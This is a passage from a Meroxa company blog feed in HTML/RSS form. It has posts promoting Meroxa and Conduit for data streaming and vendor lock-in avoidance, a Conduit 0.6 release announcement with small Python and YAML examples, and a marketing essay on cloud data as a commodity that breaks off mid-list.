            log_line &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;log_line&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
            current_timestamp &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; datetime&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;datetime&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;now&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;strftime&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;%Y-%m-%d %H:%M:%S&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            payload&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;log_line_with_timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;current_timestamp&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt; &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;log_line&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Error occurred while parsing records: &quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;These are just two examples of how Meroxa makes it effortless to work with Confluent data streams using various languages. The possibilities are vast, limited only by your imagination.&lt;/p&gt;
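&lt;p&gt;Outside the Turbine runtime, the heart of the JavaScript example above is ordinary record manipulation. Here is a plain-Python sketch of the same Celsius-to-Fahrenheit enrichment, using plain dictionaries instead of Turbine record objects (the function name is illustrative, not part of the Turbine API):&lt;/p&gt;

```python
def enrich_with_fahrenheit(records):
    """Add a temperature_fahrenheit field to each record with a Celsius reading."""
    for record in records:
        celsius = record.get("temperature_celsius")
        if celsius is not None:
            # Same formula as the JavaScript example: F = C * 9/5 + 32
            record["temperature_fahrenheit"] = celsius * 9 / 5 + 32
    return records
```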
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Meroxa brings the best practices of software development for data to any environment without bias. Meroxa’s unique and disruptive approach, combining code-first development with infrastructure abstraction, has been shown to greatly speed up the value of Confluent while significantly reducing investment and time: from months to minutes. The example provided was for Confluent, but the same applies to other key components of your existing architecture: cloud or on-prem, data-in-motion, data lakes, and migrations.&lt;/p&gt;
&lt;p&gt;To learn more about how Meroxa can help transform your data strategy, &lt;a href=&quot;https://meetings.hubspot.com/haller/demo&quot;&gt;schedule a call&lt;/a&gt; with our team of experts.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Liberate Your Data from Vendor Lock-in with Meroxa]]></title><description><![CDATA[Meroxa helps you liberate your company's data so you can avoid vendor lock-in.]]></description><link>https://meroxa.com/blog/liberate-your-data-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/liberate-your-data-with-meroxa</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 25 Apr 2023 16:43:35 GMT</pubDate><content:encoded>&lt;p&gt;As modern enterprises migrate to the cloud, they are often faced with an overwhelming number of vendor choices. Unfortunately, some companies make this critical vendor decision based on the products and services needed at that moment. This myopic approach leads to vendor lock-in.&lt;/p&gt;
&lt;p&gt;Vendor lock-in is being stuck with a vendor that is no longer aligned with your goals and needs. &lt;a href=&quot;https://www.forbes.com/sites/forbestechcouncil/2022/07/01/how-vendor-lock-in-of-databases-hurts-an-entire-industry/?sh=6ff6a4ed445c&quot;&gt;Forbes&lt;/a&gt; puts it this way:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“It essentially forces an organization to continue staying with a vendor, whether due to the exorbitant cost of switching providers or the potential interruption that could occur from a change.”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In this post, we’ll look at the risks associated with vendor lock-in along with possible options to avoid those risks. Finally, we’ll see how Meroxa’s stream processing data application platform can help break your data free from vendor lock-in.&lt;/p&gt;
&lt;h2&gt;The risks and consequences of vendor lock-in&lt;/h2&gt;
&lt;p&gt;The pain of vendor lock-in becomes acute when your vendor cannot interact with your proprietary systems, open-source systems, or with those from another vendor. The negative outcomes of vendor lock-in may include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Mounting costs and erosion of your bargaining edge.&lt;/li&gt;
&lt;li&gt;Lack of flexibility to move to a different vendor, as the migration effort brings added cost, increased risk, and extended timelines.&lt;/li&gt;
&lt;li&gt;Reduced service levels, as a vendor experiences outages but has little incentive to provide a resolution.&lt;/li&gt;
&lt;li&gt;An incompatible tech stack, leading to difficulty in configuring free-flow systems.&lt;/li&gt;
&lt;li&gt;The risk of losing access to data, applications, and other resources, if the vendor goes out of business.&lt;/li&gt;
&lt;li&gt;The inability to leverage other vendors, which might offer better technology or pricing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As we look at this extensive list of risks, we see the importance of carefully assessing the long-term implications of selecting the right vendor. How might an organization avoid these risks when it’s time to choose a vendor?&lt;/p&gt;
&lt;h2&gt;Avoid the risks of vendor lock-in&lt;/h2&gt;
&lt;p&gt;No organization intends to get stuck with a vendor and become forced to look for remediation measures later. To help guard against vendor lock-in at decision time, here are some key steps that enterprises can take:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;When evaluating vendors, prepare a list of key non-negotiable attributes, such as cost, performance, features, and upward/downward compatibility.&lt;/li&gt;
&lt;li&gt;Look for cloud services and platforms that use open standards and have broad industry support, making it easier to switch to another provider if needed.&lt;/li&gt;
&lt;li&gt;Choose service providers that make it easy to export and import data between providers.&lt;/li&gt;
&lt;li&gt;Review your cloud strategy regularly to evaluate whether your current provider continues to meet business needs.&lt;/li&gt;
&lt;li&gt;Negotiate for flexibility in contracts to allow for switching providers in the future, whenever possible.&lt;/li&gt;
&lt;li&gt;Prepare backup storage and computing resources for critical business processes, decoupling them from vendor-specific dependencies.&lt;/li&gt;
&lt;li&gt;Establish a fallback plan with a strategy to migrate quickly in case your vendor closes its doors. Put simply: Always be exit-ready.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These measures focus on taking the right action the first time, thereby ensuring that your data, applications, and other resources are portable and flexible. While the suggested steps can certainly alleviate the risks of cloud vendor lock-in, you have no guarantee of avoiding vendor lock-in completely.&lt;/p&gt;
&lt;p&gt;So what should organizations do if they are already locked in? What tools can help organizations liberate their applications and their data?&lt;/p&gt;
&lt;p&gt;It’s important to note that liberation doesn’t mean abandoning your existing vendor. Rather, we want to empower an organization by decoupling the business KPIs from vendor performance and becoming agile in the process.&lt;/p&gt;
&lt;p&gt;Meroxa is one such tool that solves the vendor lock-in problem. It allows organizations to utilize the best of the available products and services from multiple cloud providers while maintaining the free flow of data across the organization. Let’s look at how Meroxa does this.&lt;/p&gt;
&lt;h2&gt;How Meroxa liberates your data from vendor lock-in&lt;/h2&gt;
&lt;p&gt;Meroxa provides organizations with a unified and abstract view of their data—even as it’s stored in multiple cloud providers—thereby making it easier to move and manage data across different platforms.&lt;/p&gt;
&lt;p&gt;By providing services such as data integration, orchestration, and stream processing, Meroxa enables organizations to take control of their data without being tied to a single vendor. As an end-to-end platform, Meroxa enables easy access, security, and governance of data across multiple vendors.&lt;/p&gt;
&lt;p&gt;Among the tools and services provided by Meroxa, we’ll focus on Conduit and the Meroxa platform, both of which help organizations to move data among cloud platforms, bringing ease of switching between providers as needed.&lt;/p&gt;
&lt;h3&gt;Data integration with Conduit&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; is a low-level, open-source data streaming tool that helps developers move data across systems. Whether an organization needs to move data between databases, files, or APIs, Conduit supports all kinds of data motion. Conduit already ships with an extensive set of built-in connectors, but you can also write your own connectors—in any language—for custom data integrations.&lt;/p&gt;
&lt;p&gt;One common use case for Conduit is data migration from Apache Kafka to PostgreSQL, an effort that would otherwise require extensive development, testing, and troubleshooting.&lt;/p&gt;
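&lt;p&gt;As a rough sketch, such a pipeline can be described declaratively in a Conduit pipeline configuration file. The version number, plugin names, and settings below are illustrative and will vary with your Conduit release and connector setup:&lt;/p&gt;

```yaml
# Illustrative Conduit pipeline configuration (hypothetical values):
# a Kafka topic streamed into a PostgreSQL table.
version: 2.0
pipelines:
  - id: kafka-to-postgres
    status: running
    connectors:
      - id: kafka-source
        type: source
        plugin: builtin:kafka
        settings:
          servers: "localhost:9092"
          topic: "orders"
      - id: postgres-destination
        type: destination
        plugin: builtin:postgres
        settings:
          url: "postgres://user:password@localhost:5432/appdb"
          table: "orders"
```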
&lt;h3&gt;Stream processing applications with the Meroxa platform&lt;/h3&gt;
&lt;p&gt;Meroxa is a platform as a service that enables developers to declaratively orchestrate end-to-end streaming data movement and processing via a programming language of their choice. All of the needed functionality is encapsulated in an application framework called &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started/&quot;&gt;Turbine&lt;/a&gt;. Developers build, test, and deploy their Turbine applications to the Meroxa platform, and the platform takes care of the rest. The Turbine framework not only enables integration with popular tools and platforms, but it also supports the use of highly specialized tools, such as &lt;a href=&quot;https://meroxa.com/blog/real-time-fraud-detection-with-turbine-and-novelty-detector&quot;&gt;thatDot Novelty Detector&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s look at two typical use cases for Meroxa, seeing how it enables easy stream processing between two distinct systems.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;Streaming changes in real-time from MongoDB to Apache Kafka &lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Liberate%20Your%20Data%20from%20Vendor%20Lock-in%20with%20Meroxa%20-%20FINAL.png&quot; alt=&quot;Liberate Your Data from Vendor Lock-in with Meroxa - FINAL&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;A Change Data Capture (CDC) connector is created from the Meroxa platform and applied to a MongoDB Atlas-hosted database. That connector is used by a Turbine Stream Processing Data App that receives changes in real-time and publishes them as a stream. The Turbine library enables developers to write transformations on this stream, which then continues to a downstream Kafka cluster.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa&quot;&gt;Real-time data migration and transformation from PostgreSQL to MongoDB &lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Liberate%20Your%20Data%20from%20Vendor%20Lock-in%20with%20Meroxa%20-%20FINAL-2.png&quot; alt=&quot;Liberate Your Data from Vendor Lock-in with Meroxa - FINAL-2&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In this Turbine app, developers create a CDC connector and apply it to a PostgreSQL database to receive real-time updates and publish them in the form of a stream. The Turbine application can perform transformations as necessary and then subsequently stream this data to MongoDB in real-time.&lt;/p&gt;
&lt;p&gt;Following a &lt;a href=&quot;https://meroxa.com/blog/introducing-visualized-turbine-applications&quot;&gt;recent update&lt;/a&gt;, Meroxa has gone a step further to provide developers with real-time visualization tools, allowing them to see what’s happening behind the scenes in their deployed Turbine applications. Developers can see through dashboards and visualizations how data flows from sources through processing functions and on to destinations.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The risks associated with vendor lock-in often outweigh the benefit of simplicity that comes with using a single vendor. Organizations have long faced the consequences of vendor lock-in, and they see the value of taking the necessary steps to avoid being stuck with the wrong vendor for the job.&lt;/p&gt;
&lt;p&gt;In this post, we’ve highlighted the difficulty that comes with transitioning from a vendor when it no longer aligns well with your business or technological requirements. While we considered the steps you can take to minimize the risk, vendor lock-in is always a possibility.&lt;/p&gt;
&lt;p&gt;Fortunately, Meroxa provides enterprises with tools to liberate their data, decoupling that data from any specific vendor. Tools such as Conduit and Meroxa help with data integration, data movement, and data processing, within and across all cloud services and providers.&lt;/p&gt;
&lt;p&gt;To see how Meroxa can solve vendor lock-in concerns specific to your organization, &lt;a href=&quot;https://meetings.hubspot.com/haller/demo&quot;&gt;schedule a call&lt;/a&gt; with our experts.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Conduit 0.6]]></title><description><![CDATA[Conduit 0.6, is full of features and bug fixes that will help developers as they operate Conduit in production environments.]]></description><link>https://meroxa.com/blog/conduit-0.6</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.6</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 11 Apr 2023 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;With Conduit 0.6, we’re inching closer to the 1.0 release. Conduit is an important building block in the Meroxa platform to stream data from and to a variety of data stores. Starting with Conduit 0.5, we’ve made a concerted effort to focus on features and bug fixes that help developers as they operate Conduit in production environments. This is true for the Meroxa platform and those that use Conduit today.&lt;/p&gt;
&lt;h2&gt;Significant Features&lt;/h2&gt;
&lt;h3&gt;More ways to install Conduit&lt;/h3&gt;
&lt;p&gt;Let’s face it. There’s so many different ways a Developer or a DevOps team wants to install software on their machines or in a production environment. That’s why all of our releases starting with 0.6 will have the ability to be installed via:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#homebrew&quot;&gt;Homebrew&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#rpm&quot;&gt;RPM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit#debian&quot;&gt;Debian Packages&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Connector Lifecycle Events&lt;/h3&gt;
&lt;p&gt;Before Conduit 0.6, a Conduit connector only needed to respond to a handful of events from Conduit itself: &lt;code class=&quot;language-text&quot;&gt;Configure&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Open&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Read&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Write&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Ack&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;Teardown&lt;/code&gt;. These events get emitted to the connector through the invocation of a pipeline. At first glance, these events seem more than enough to cover the needs of various data stores and ways to connect to them. In practice, they weren’t enough to cover extra actions a connector might want to take. Say you wrote a Change Data Capture connector for Postgres: you need to open a replication slot on the database and close the slot when you’re done streaming data. With the new lifecycle events, you can open the replication slot in the Source &lt;code class=&quot;language-text&quot;&gt;OnCreate&lt;/code&gt; event, and when the connector shuts down, close the slot in the Source &lt;code class=&quot;language-text&quot;&gt;OnDelete&lt;/code&gt; event.&lt;/p&gt;
&lt;p&gt;In Conduit 0.6, we’ve introduced a few more events throughout the connector’s lifecycle. These events include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Source &lt;code class=&quot;language-text&quot;&gt;OnCreate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Source &lt;code class=&quot;language-text&quot;&gt;OnUpdate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Source &lt;code class=&quot;language-text&quot;&gt;OnDelete&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Destination &lt;code class=&quot;language-text&quot;&gt;OnCreate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Destination &lt;code class=&quot;language-text&quot;&gt;OnUpdate&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Destination &lt;code class=&quot;language-text&quot;&gt;OnDelete&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With these extra events, you now have more control over what your connector does, and when, as Conduit includes it in a pipeline. If you want more information, check the original &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/design-documents/20230228-connector-lifecycle-methods.md&quot;&gt;Design Doc&lt;/a&gt; and the &lt;a href=&quot;https://github.com/ConduitIO/conduit/pull/954&quot;&gt;associated&lt;/a&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/810&quot;&gt;issues&lt;/a&gt;.&lt;/p&gt;
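&lt;p&gt;To make the ordering concrete, here is a purely illustrative Python sketch of how a source connector might pair the new lifecycle events with the replication-slot example above. The class and method names are hypothetical stand-ins, not the actual Conduit connector SDK (which is written in Go); the sketch only shows where one-time setup and cleanup work would hang off &lt;code class=&quot;language-text&quot;&gt;OnCreate&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;OnDelete&lt;/code&gt;, relative to the per-run events that already existed.&lt;/p&gt;

```python
# Hypothetical sketch -- NOT the real Conduit connector SDK (which is Go).
# It only illustrates where lifecycle work would live.
class PostgresCDCSource:
    def __init__(self):
        self.slot_open = False
        self.events = []  # recorded so we can inspect the ordering

    # Lifecycle events (new in Conduit 0.6): fired once per connector lifetime.
    def on_create(self, config):
        # One-time setup, e.g. creating a replication slot on Postgres.
        self.slot_open = True
        self.events.append("OnCreate: replication slot opened")

    def on_delete(self):
        # One-time cleanup, e.g. dropping the replication slot.
        self.slot_open = False
        self.events.append("OnDelete: replication slot closed")

    # Per-run events that existed before 0.6.
    def open(self):
        self.events.append("Open")

    def read(self):
        assert self.slot_open, "slot must exist before reading"
        self.events.append("Read")
        return {"op": "insert", "payload": {"id": 1}}

    def teardown(self):
        self.events.append("Teardown")


src = PostgresCDCSource()
src.on_create(config={})   # connector added to a pipeline
src.open()
record = src.read()
src.teardown()             # pipeline stops; the slot stays open for restarts
src.on_delete()            # connector removed: only now is the slot dropped
print(src.events)
```

The point of the sketch is the asymmetry: &lt;code class=&quot;language-text&quot;&gt;Open&lt;/code&gt;/&lt;code class=&quot;language-text&quot;&gt;Teardown&lt;/code&gt; can fire on every pipeline run, while the expensive setup and cleanup happen exactly once.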
&lt;h3&gt;Parallel Processors&lt;/h3&gt;
&lt;p&gt;Previously, when you added a processor to a Conduit pipeline, that processor would process records sequentially as they were pulled from the upstream data source. With the release of Parallel Processors, you can now specify a number of workers, and Conduit will distribute incoming records across those processor workers. This allows processors to keep up with high-velocity pipelines. Keep in mind that workers may process records out of order, but the records will flow out of the processor in the order they came in.&lt;/p&gt;
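&lt;p&gt;That ordering guarantee is worth a small illustration. In the Python sketch below (illustrative only, not Conduit code), records are handed to several workers that deliberately finish out of order, yet the results are emitted in the order the records arrived, which is the same behavior parallel processors give you.&lt;/p&gt;

```python
import time
from concurrent.futures import ThreadPoolExecutor

def process(record):
    # Simulate uneven processing times so workers finish out of order.
    time.sleep(0.05 if record % 2 else 0.01)
    return record * 10

records = list(range(8))

# Like a processor with workers: 4 -- Executor.map runs tasks concurrently
# but yields results in input order, regardless of completion order.
with ThreadPoolExecutor(max_workers=4) as pool:
    out = list(pool.map(process, records))

print(out)  # results appear in input order despite concurrent execution
```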
&lt;p&gt;To kick the tires on this, you’ll need to include the number of &lt;code class=&quot;language-text&quot;&gt;workers&lt;/code&gt; you want in your pipeline configuration file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.0&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pipeline1
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; proc1
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; js
        &lt;span class=&quot;token key atrule&quot;&gt;workers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you don’t include &lt;code class=&quot;language-text&quot;&gt;workers&lt;/code&gt; in your processor definition, the default will be &lt;code class=&quot;language-text&quot;&gt;1&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To learn more about Parallel Processors, go &lt;a href=&quot;https://github.com/ConduitIO/conduit/pull/744&quot;&gt;check out the PR&lt;/a&gt;!&lt;/p&gt;
&lt;h2&gt;Looking forward to 1.0&lt;/h2&gt;
&lt;p&gt;One of our main principles on the Conduit team is to make sure that what we say Conduit does is actually what you get. This is why we’ve been so focused on making sure that operating Conduit works as expected. In terms of feature development, we want 1.0 to signify that Conduit won’t have any major breaking changes. This provides guarantees around how you can expect to interface with and develop against Conduit. At this time, we don’t expect any major breaking changes to the internal APIs of Conduit or the connector spec. Once we spend more time with Conduit in Meroxa’s production environment, we’ll be able to gather the information we need to know whether those APIs will need to change.&lt;/p&gt;
&lt;p&gt;So what does the next set of capabilities and features look like? We’re diligently working on a Conduit Kubernetes Operator. For advanced production environments, this will make running a Conduit service that much easier, with all of the needed behaviors around starting, stopping, and restarting pipelines built in. But that’s just one of the many capabilities we’re looking to add before we get to 1.0; check out all of the &lt;a href=&quot;https://github.com/ConduitIO/conduit/milestones?with_issues=no&quot;&gt;milestones&lt;/a&gt; in GitHub for more information.&lt;/p&gt;
&lt;h2&gt;We’d love your feedback too!&lt;/h2&gt;
&lt;p&gt;As we start gearing up for 1.0, we’d love to get your feedback! If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.6.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[If Data is the New Oil, Why isn't Data a Commodity?]]></title><description><![CDATA[Because of Meroxa's revolutionary code-first strategy, Meroxa is the only independent streaming integration provider that frees you from vendor lock-in.]]></description><link>https://meroxa.com/blog/why-isnt-data-a-commodity</link><guid isPermaLink="false">https://meroxa.com/blog/why-isnt-data-a-commodity</guid><dc:creator><![CDATA[Keith Haller]]></dc:creator><pubDate>Fri, 17 Mar 2023 00:36:45 GMT</pubDate><content:encoded>&lt;p&gt;If you drive a Tesla or any other electric vehicle, you realize the cost and limitations when a utility such as electricity is not available as a commodity. Electric vehicle owners today are limited to only having access to electricity from a single proprietary delivery platform. As a result, electric vehicle owners spend more money to access what should be a commodity.&lt;/p&gt;
&lt;p&gt;Similarly, cloud storage was supposed to be a utility, but it has the same proprietary access with limited integrations. Cloud vendors today allow access to data, as long as it&apos;s stored or accessed from their cloud, requiring users to exclusively use their cloud services. As a result, very few companies enjoy the benefits of multi-cloud and are locked into using a single cloud provider. We know this is true due to the increasing number of Chief Cloud Economist roles being established to oversee the costs associated with cloud services.&lt;/p&gt;
&lt;p&gt;What should be a commodity like oil is instead locking customers into high prices, ultimately limiting the potential for innovation and a multi-cloud enterprise strategy. Cloud data storage itself is not proprietary, but since the integrations built to support that cloud storage are proprietary, data cannot be a commodity and is therefore nothing like oil.&lt;/p&gt;
&lt;h3&gt;So how do cloud platform vendors have you over the barrel?&lt;/h3&gt;
&lt;p&gt;Cloud vendors have you tied to their platform simply because all the integrations to your data are customized, limited, and proprietary to their cloud platform alone. You may want to move to another cloud vendor, but you can’t, because your integration stack only works with your current provider’s cloud.&lt;/p&gt;
&lt;p&gt;Unfortunately, cloud storage vendors will never provide multi-cloud integrations, making it challenging for customers to compare and choose a storage provider based on features and price. Cloud vendors don’t want multi-cloud environments, because having proprietary rights to your data gives them an advantage by locking you in, resulting in a premium to you. It has been and always will be this way. It would be unwise to assume anything different. Additionally, cloud vendors even penalize you for switching/migrating data to another platform.&lt;/p&gt;
&lt;p&gt;The cloud lock-in becomes painfully apparent when your Cloud Utility bill reaches millions of dollars, and there becomes a need to develop new skills within the organization for cloud accounting.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Is%20Data%20the%20New%20Oil%20Blog%20Image%201.png&quot; alt=&quot;Top Cloud Challenges from Flexera&quot;&gt;&lt;/p&gt;
&lt;p&gt;Source: &lt;a href=&quot;https://www.infoworld.com/article/3689813/cloud-trends-2023-cost-management-surpasses-security-as-top-priority.html&quot;&gt;https://www.infoworld.com/article/3689813/cloud-trends-2023-cost-management-surpasses-security-as-top-priority.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In order for cloud storage to truly be as valuable as oil, you have to have a multi-cloud strategy from a neutral third-party vendor.&lt;/p&gt;
&lt;h3&gt;What is an example of a successful third-party vendor and how will that change in the next 3 years?&lt;/h3&gt;
&lt;p&gt;Informatica is a good example of a neutral third-party vendor that enabled uniform integration with multiple data stores. Before Informatica became an enterprise leader in ETL, the Relational Database Management System (RDBMS) vendors (e.g., Oracle, Sybase) each provided their own ETL tool, customized for only their RDBMS. Customers gained tremendously by using a neutral third-party vendor such as Informatica, which allowed standardization of data integrations across all RDBMSs. Informatica helped data become more of a commodity across storage platforms. Similarly, today, data needs to become more of a commodity across clouds and data lakes.&lt;/p&gt;
&lt;h3&gt;The actual cost of proprietary single cloud storage is the loss of competitive advantage to companies that transition from “platform-led” to “developer-led” discovery.&lt;/h3&gt;
&lt;p&gt;If you overspend on cloud resources because you have no choice and all your integrations are proprietary, you will have to resort to only looking at data that is absolutely needed. That has always been the downside of a “platform-led” approach to discovery. The cost of cloud will limit your ability to experiment with and explore new data. All the data that your business users suspect might be valuable but aren’t sure about because it’s too expensive to evaluate, will be left behind. However, companies that transition to “developer-led” will figure out how to make the cloud a utility, and can then afford discovery and exploration. They will have tools that enable a top-down, “developer-led” flexible approach to triaging data.&lt;/p&gt;
&lt;p&gt;Meanwhile, your company will unfortunately be stuck with a lock-and-load “platform-led” approach with a single cloud vendor that performs queries at incredible speeds, but also at incredible costs and rigidity. There has always been too much emphasis on optimizing the vendor platform per known queries and not enough focus on supporting discovery and exploration. Data platforms have never focused on new data that business users might find valuable. This “platform-led” approach never afforded the luxury of storing everything that anybody thought might be valuable and then hoping for the best. To remain competitive, companies need to change how they approach data discovery and exploration. Modern data architectures will have to move towards a more flexible and open “developer-led” approach that allows for experimentation and discovery.&lt;/p&gt;
&lt;p&gt;The innovations needed will occur at the front-end of integration with the business user, not at the storage end. This will be explored further in my next blog.&lt;/p&gt;
&lt;h3&gt;How do you create a neutral data integration strategy that is not biased toward a single cloud or even toward a cloud at all?&lt;/h3&gt;
&lt;p&gt;Enabling a multi-cloud design and reducing cloud costs doesn’t need to be difficult. Using the right tool that gives you the flexibility to work with your data regardless of where it lives can help you create a neutral data integration strategy. At Meroxa, we offer a code-first approach to data integration, resulting in cloud neutrality and making data a commodity just like oil.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What makes Meroxa different than other platforms:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Code-First - Developers of any skill level can build data products in the language of their choice with the ultimate flexibility that code provides. Companies do not need subject matter experts to work with their data. In just &lt;a href=&quot;https://meroxa.com/blog/real-time-data-streaming-from-postgresql-to-kafka-4-lines-of-code-w/-cdc/&quot;&gt;4 lines of code&lt;/a&gt; you can move data around like a commodity, to and from any cloud vendor.&lt;/li&gt;
